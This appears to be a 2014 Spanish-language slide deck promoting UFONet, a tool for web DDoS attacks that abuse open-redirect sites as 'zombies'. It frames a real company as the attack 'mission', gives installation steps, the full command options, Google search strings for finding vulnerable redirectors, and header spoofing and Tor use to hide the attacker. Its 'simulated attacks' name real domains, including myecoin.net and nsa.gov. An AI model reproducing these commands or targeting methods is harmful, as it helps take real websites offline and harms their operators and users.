PDF de programación - UFONet v0.3 Ataques DDoS vía Web Abuse

===============================================

UFONet

Ataques DDoS vía Web Abuse
2013/2014
por psy

===============================================
http://ufonet.sf.net



Edición: GSICKMINDS – 2014
===============================================
WARNING !!!!
WARNING !!!!

Nombre: Coltán

Composición:

-Columbita; FeMn+Nb2O6 (óxido de niobio)
-Tantalita; FeMn+Ta2 (óxido de tántalo)

Relevancia: Condensador electrolítico

Uso: Telefonía móvil, computadoras, implantes médicos, armamento...

Problemática:

- Congo → 82% reserva mundial (Grandes Lagos).
- Prolifera entre uranio, torio y radio (radioactividad).
- Consideración: recurso energético no renovable, estratégico.
- Guerra: Desde 1998. Apróx 5,7 Millones de víctimas.
* Ejército Patriótico Ruandés → Ruanda → Occidente.
* Occidente condona deuda Ruanda + crédito FMI y Banco Central.
- Precio: 1Tn = 400.000$ | 18 meses → 250.000M$
- Salario: Media Congo → 8€/m | Minero: 42€/m

===============================================

Edición: GSICKMINDS – 2014
===============================================
WANTED:
WANTED:

ID: Paul Kagame (23/10/1957)

Cargo: Presidente de Ruanda
CV:

- Fundador Frente Patriótico Ruandés
- Jefe de inteligencia militar: ERN
- Entrenamiento: Fort Leavenworth(USA)

Crímenes:
- Órden asesinato: Juvénal Habyarimana(Ruanda)
- Órden asesinato: Cyprien Ntaryamira(Burundi)
- Dirigir genocidio desde 1994

Prodecimiento:

25/09/2003: Recibe inmunidad diplomática
14/11/2003: Carla Del Ponte(SUI), fiscal TIDH -> destituída
21/01/2005: Stephen Rapp(USA), fiscal de OBAMA → toma el cargo
06/02/2008: Proceso abierto por crímenes contra la humanidad(pdf)
30/10/2014: En libertad

===============================================

Edición: GSICKMINDS – 2014
===============================================
MISIÓN: → foxconn.com
foxconn.com
MISIÓN: →

RealNick: Hon Hai Precision Industry Co.(TAI)

Dueño: Terry Guo aka Gou Tai-ming

Información:

Mayor productor mundial de aparatos electrónicos

Contratos:

*BlackBerry *iPad, *iPhone, *Kindle, *Playstation4
*Xbox One, *Wii U

Clientes:



Acer Inc.(TAI)
Amazon.com(USA)
Apple Inc.(USA)
BlackBerry Ltd.(CAN)
Cisco(USA)
Dell(USA)
Google(USA)
Hewlett-Packard(USA)

Microsoft(USA)
Motorola Mobility(USA)
Nintendo(JPN)
Nokia(FIN)
Sony(JPN)
Toshiba(JPN)
Vizio(USA)

===============================================

Edición: GSICKMINDS – 2014
===============================================
STATUS:
STATUS:

===============================================

TANGO DOWN ! ;-)

===============================================

UFONet

Ataques DDoS vía Web Abuse
2013/2014
por psy

===============================================
http://ufonet.sf.net

Versión actual (05/10/2014): v0.3.1b - Abduction
===============================================

* Qué es UFONet?

* Cómo funciona?

* Instalación

* Características

* Ejemplos de uso

* Ataque Simulado

* Siguiente versión

* Cómo contribuir?

===============================================



'Top 10' riesgos en aplicaciones: OWASP 2013

/Qué es UFONet?/
===============================================

+ Herramienta automática para lanzar ataques DDoS

+ Escrita en python / GPL v3.0

+ Primera versión:

- Nacida como modulo de XSSer (2009)
- Lanzada: v0.1b → 2013

+ Explota la Capa 7 (HTTP/Web Abuse)

- Vectores “Open Redirect”

OWASP: Top 10 2013-A10-Unvalidated Redirects and Forwards

+ Objetivo → Agotamiento de recursos (DoS)

===============================================



/Cómo funciona?/
===============================================

Vídeo (v0.1b): UFONet PoC

+ CWE-601: URL Redirection to Untrusted Site

Una aplicación web acepta una entrada controlada
por el usuario, que especifica un enlace a
un sitio web externo y éste, utiliza ese enlace
para una redirección.

+ OWASP: URL Redirector Abuse

Una aplicación acepta URLs arbitrarias definidas
por el usuario, que luego se utilizan como
objetivos para la redirección. Los usuarios pueden
ser reconducidos, sin saberlo, a un sitio malicioso
desde otro de confianza.

Ej: Ataques de Phising

===============================================



/Cómo funciona?/
===============================================

Vídeo (v0.3b/DE): DDoS-Angriff über Validatoren



===============================================



/Instalación/
===============================================

Código: git clone https://github.com/epsylon/ufonet

UFONet funciona en diferentes plataformas.

- GNU/Linux / Win32 / OSX …


Requiere:

- Python (~2.7.x)

- python-pycurl - Python bindings to libcurl

En sistemas basados en Debian (ej: Ubuntu):

~$ sudo apt-get install python-pycurl


===============================================



/Características/
===============================================

Ver comandos: $ ufonet -h / --help

+ Modularidad:

- Código escrito desde 0 (Limpio)

+ Proxy: (ej: Tor)

- Maestro → Proxy → Proxy(Zombie) → Objetivo

+ Spoofing: (Cabeceras HTTP)

- User-Agent/Referer/Host/X-Forwarded-For/...

+ Controlador de la Botnet:

- Buscar 'zombies' en Internet
- Probar las vulnerabilidades (Open Redirect)

+ Impacto: Petición(es) / Evadir cache en objetivo/...


===============================================



/Características/
===============================================

Primera versión: 18.06.2013

--version show program's version number and exit
-v, --verbose active verbose on requests
--check-tor check to see if Tor is used properly
--update check for latest stable version

*Configure Request(s)*:
--proxy=PROXY Use proxy server (tor: http://localhost:8118)
--user-agent=AGENT Use another HTTP User-Agent header (default SPOOFED)
--referer=REFERER Use another HTTP Referer header (default SPOOFED)
--host=HOST Use another HTTP Host header (default NONE)
--xforw Set your HTTP X-Forwarded-For with random IP values
--xclient Set your HTTP X-Client-IP with random IP values
--timeout=TIMEOUT Select your timeout (default 30)
--retries=RETRIES Retries when the connection timeouts (default 1)
--delay=DELAY Delay in seconds between each HTTP request (default 0)

*Manage Botnet*:
-s SEARCH Search 'zombies' on google (ex: -s 'proxy.php?url=')
--sn=NUM_RESULTS Set max number of result to search (default 10)
-t TEST Test list of web 'zombie' servers (ex: -t zombies.txt)

*Configure Attack(s)*:
-r ROUNDS Set number of 'rounds' for the attack (default: 1)
-b PLACE Set a place to 'bit' on target (ex: -b /path/big.jpg)
-a TARGET Start a Web DDoS attack (ex: -a http(s)://target.com)


===============================================



/Ejemplos de uso/
===============================================

Regalo zombie: pastebin

+ Búsqueda de 'zombies'

UFONet buscará en los resultados de google

1- Buscar resultados:

Ej: ./ufonet -s 'proxy.php?url=' --sn '100'

'checklink?uri='
'validator?uri='

2- Probar validez:

Wanna check if they are valid zombies? (Y/n)

3- Actualizar lista:

Wanna update your list (Y/n)

===============================================



/Ejemplos de uso/
===============================================

Documentación: README

+ Probar la botnet

UFONet probará las vulnerabilidades 'Open Redirect'

http://target.com/check?uri=<PAYLOAD>

Ej: ./ufonet -t zombies.txt

1- ¿Están vivos?:

HTTP HEAD Check:

- Desde maestro: RECUERDA -> PROXY!!!
- Desde fuera: downforeveryoneorjustme

2- Actualizar lista:

Wanna update your list (Y/n)


===============================================



/Ejemplos de uso/
===============================================

Mayor ataque probado: 3439 zombies

+ Atacando un objetivo

UFONet conducirá los zombies hasta el objetivo

+ Número de rondas por zombie

Ej: -r 10 / -r 10000

+ Lugar para “morder” (Ej: Película Flash, ...)

Ej: -b "/images/big_size_image.jpg"

-------------------------------------------------------

./ufonet -a http://target.com

* Round: Is target up?

Your target looks ONLINE!. Wanna start a DDoS attack? (y/N)

===============================================



/Ataque Simulado/
===============================================

All my zombies are belong to you ;-)

+ Desde maestro:

./ufonet –-check-tor

===============================================



/Ataque Simulado/
===============================================

All my zombies are belong to you ;-)

./ufonet –t zombies.txt


===============================================



/Ataque Simulado/
===============================================

All my zombies are belong to you ;-)

./ufonet -a http://myecoin.net -r 10000


===============================================



/Ataque Simulado/
===============================================

It's not just you! http://nsa.gov looks down from here

+ Desde objetivo:


===============================================



/Siguiente versión/
===============================================

Irc.freenode.net / #ufonet

+ Nombre: UFONEt v0.4b: Infection!

* Ideas:

- POST
- XML
- Anti-IDS/NIDS
- XSS/CSRF
- Multithreading
- HTTP Headers (rfc4229)
- GUI/GTK+
- Geomapping
- Impacto visual
- Estadísticas/Informes

- [...]


===============================================



/Cómo contribuir?/
===============================================

Autor: [email protected] <> @psytzsche

+ Desarrollo:

- Testeo
- Documentación
- Corrección de errores / Hacking ;-)
- Propuestas/Ideas/Nuevas caract